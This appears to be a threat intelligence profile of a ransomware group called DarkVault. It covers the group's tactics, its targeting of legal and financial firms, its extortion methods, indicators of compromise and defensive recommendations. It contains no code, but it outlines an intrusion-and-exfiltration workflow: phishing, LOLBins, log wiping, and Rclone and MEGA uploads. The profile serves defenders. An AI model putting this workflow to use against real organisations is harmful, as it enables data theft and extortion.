1. Overview
DarkVault is a relatively new but increasingly active ransomware group, first identified in late 2023, and quickly establishing itself as a quiet but formidable actor in the double extortion space. The group targets medium to large organisations across Europe, the UK, and North America, with an emphasis on finance, professional services, logistics, legal, and technology sectors.
Unlike higher-profile groups such as LockBit or Cl0p, DarkVault avoids publicity. It does not maintain a high-traffic leak site and appears to favour private negotiations and discreet extortion tactics. Its operations suggest a focus on data exfiltration over encryption, with minimal forensic traces and rapid execution.
2. Origin and Evolution
DarkVault first came to light in Q4 2023, following an incident in which a mid-sized European investment firm suffered a silent breach, culminating in the exfiltration of sensitive legal and client files without any accompanying ransomware encryption.
Subsequent investigations revealed a pattern of custom malware payloads, PowerShell-based data staging, and carefully targeted phishing used to compromise credentials and move laterally. Over time, DarkVault has expanded its operations, adopting elements of classic ransomware models—such as limited encryption and data leak threats—while maintaining a stealth-first approach.
By early 2024, multiple UK-based organisations had reported breaches attributed to DarkVault, marking it as a growing threat to data-heavy sectors.
3. Tactics, Techniques, and Procedures (TTPs)
DarkVault employs a minimalist yet efficient toolkit, combining bespoke code with living-off-the-land techniques:
- Initial Access:
Spear-phishing emails with malicious documents (T1566.001), credential reuse from prior breaches (T1078), and exploitation of misconfigured VPN and cloud storage endpoints (T1190). - Lateral Movement:
Use of RDP, WMI, and custom PowerShell scripts to navigate the network (T1021). The group avoids noisy tools like Cobalt Strike and tends to move laterally without triggering EDR alerts. - Data Exfiltration:
Highly targeted exfiltration using Rclone, MEGA, and secure FTP (T1041). Data is typically compressed with 7-Zip, then staged in cloud storage with time-delayed deletion links. - Encryption (optional):
While many campaigns are exfiltration-only, some incidents involve selective encryption using proprietary ransomware payloads. Encrypted files may have extensions like.dvaultor.lockedvault. - Persistence & Evasion:
Registry modification (T1112), scheduled tasks, and use of LOLBins (T1218) are common. Logging and forensic artefacts are deliberately cleaned or overwritten.
4. Targeting Profile
DarkVault targets organisations with low tolerance for data leakage, often in sectors that handle:
- Intellectual property
- Regulatory data (e.g., GDPR/PCI)
- Legal documents and contracts
- M&A or private equity deal flow
- Client confidentiality agreements
Frequent target sectors include:
- Legal and financial services
- Private equity and wealth management
- Consulting and professional services
- Tech and software development firms
- Logistics and engineering firms
Several UK-based law firms and fintechs have already been named as confirmed victims, though these incidents often remain unreported publicly.
5. Notable Campaigns and Victims
While DarkVault does not operate a public leak site, victim data is occasionally released via:
- Anonymous file-sharing platforms (e.g., anonfiles, gofile.io)
- Dark web forums and ransomware affiliate channels
- Direct leaks to journalists or competitors
Notable but discreetly handled cases include:
- A UK-based legal advisory firm with exposed M&A documents and NDAs
- A German logistics software provider, with customer integrations leaked
- A North American hedge fund, where client financials and LP reports were targeted
Ransom demands are typically in the £100,000 to £2 million range, depending on the size and sensitivity of the exfiltrated data.
6. Ransomware and Leak Site Behaviour
DarkVault does not maintain a persistent leak site. Instead, it employs:
- One-time communication portals over TOR
- Email-based negotiation, often with PGP signatures
- Sample leaks to pressure victims, but not widespread public publication
- Short-lived links to data proof-of-concept dumps
This controlled release model is designed to pressure victims without attracting law enforcement or media scrutiny.
7. Technical Indicators
Common indicators associated with DarkVault include:
- File extensions:
.dvault,.lockedvault(where encryption occurs) - Ransom note:
NOTICE_TO_RECOVER.txtorVAULT_RESTORE.txt - Use of
rclone.exe,7z.exe, and PowerShell-based upload scripts - Scheduled tasks set with non-standard names like
SysHelperorVaultRunner - MEGA and FTP upload traces to Eastern European domains
Detection relies on monitoring for archive creation, outbound cloud uploads, and PowerShell obfuscation.
8. Defensive Measures and Recommendations
To defend against DarkVault:
- Enforce MFA on all access points and admin accounts
- Monitor for PowerShell script execution and exfiltration behaviour
- Deploy EDR/XDR with cloud upload detection capabilities
- Segment critical file servers and monitor for unusual ZIP/7Z usage
- Implement DLP (Data Loss Prevention) tools across cloud and on-prem systems
- Conduct tabletop exercises for data breach extortion scenarios
DarkVault is stealthy and prefers quiet leverage—visibility and alerting on data movement is key.
9. Attribution and Alliances
Attribution is currently unclear. DarkVault uses custom code and infrastructure, but code analysis suggests a possible fork from older Conti or Avaddon modules. Language artefacts point to Eastern European origins, though this is unconfirmed.
There is no clear evidence of RaaS or affiliate recruitment, indicating a centralised, internal operation. DarkVault may be cooperating with access brokers or partnering with silent actors focused on data monetisation.
10. Conclusion
DarkVault represents a modern evolution of ransomware operations, focused more on data leverage than encryption, and designed to evade publicity and maximise pressure. Its stealth, discretion, and focus on legal and financial sectors make it a growing threat to UK enterprises handling regulated or reputationally sensitive data.
Organisations should prioritise visibility into outbound data movement, adopt resilient segmentation, and prepare for the realities of extortion without encryption.
Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025
